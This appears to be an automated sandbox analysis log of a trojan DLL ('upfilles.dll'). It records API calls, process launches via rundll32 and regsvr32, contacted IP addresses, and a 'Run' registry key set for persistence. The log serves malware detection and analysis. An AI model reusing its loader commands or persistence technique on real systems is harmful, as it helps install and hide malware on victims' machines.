                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                      Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownHTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800012B0 NtConnectPort,NtRequestWaitReplyPort,NtRequestPort,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180001490 NtCreateSection,LocalAlloc,LocalAlloc,NtConnectPort,NtRequestWaitReplyPort,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180001650 RtlInitUnicodeString,NtClose,NtClose,RtlNtStatusToDosError,SetLastError,LocalFree,LocalFree,LocalFree,LocalFree,
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_3_000002921300D31C NtProtectVirtualMemory,
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_3_000002921300D2AC NtAllocateVirtualMemory,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A6814 NtFreeVirtualMemory,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A958C NtAllocateVirtualMemory,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013AA5CC NtDelayExecution,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A6728 NtWriteFile,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A6618 RtlInitUnicodeString,NtCreateFile,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A650C RtlInitUnicodeString,NtCreateFile,NtClose,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A6464 RtlInitUnicodeString,NtOpenFile,NtClose,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A67A0 NtClose,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C030
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000A040
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800190AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180001950
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000B992
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800131E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000E200
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000B210
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800192B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180020B88
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180004C00
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180013448
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C45C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000C480
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EC90
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800154A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023584
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800176FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000292116E254C
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000000026E7DFB4C
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A1030
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
                      Source: upfilles.dll.dllBinary or memory string: OriginalFilenameeppcom64.dllZ vs upfilles.dll.dll
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@32/17@8/6
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_3_00007DF4F0240000 CreateToolhelp32Snapshot,Process32First,Process32Next,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000AEB0 CoCreateInstance,
                      Source: C:\Windows\System32\rundll32.exeMutant created: NULL
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7272
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7288
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6324
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6516
                      Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\ba1d38a4-2e70-4cdd-8ce4-6f972928d4e8Jump to behavior
                      Source: upfilles.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                      Source: upfilles.dll.dllReversingLabs: Detection: 15%
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6516 -s 344
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7272 -s 344
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7288 -s 344
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow
                      Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: upfilles.dll.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: upfilles.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: X:\Gitlab\Builds\e945be61\0\lab\protectionplatform\Output\Release\x64\eppcom64.pdb source: rundll32.exe, 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1803925725.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1853230060.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1842561236.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.2936902948.0000000180025000.00000002.00000001.01000000.00000003.sdmp, upfilles.dll.dll
                      Source: upfilles.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: upfilles.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: upfilles.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: upfilles.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: upfilles.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: upfilles.dll.dllStatic PE information: real checksum: 0x491bb should be: 0x85fc5
                      Source: upfilles.dll.dllStatic PE information: section name: hVr
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180006138 push E8000020h; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000292116A5BB0 push r15; ret
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000000026E7A31B0 push r15; ret
                      Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateJump to behavior
                      Source: C:\Windows\System32\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023584 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
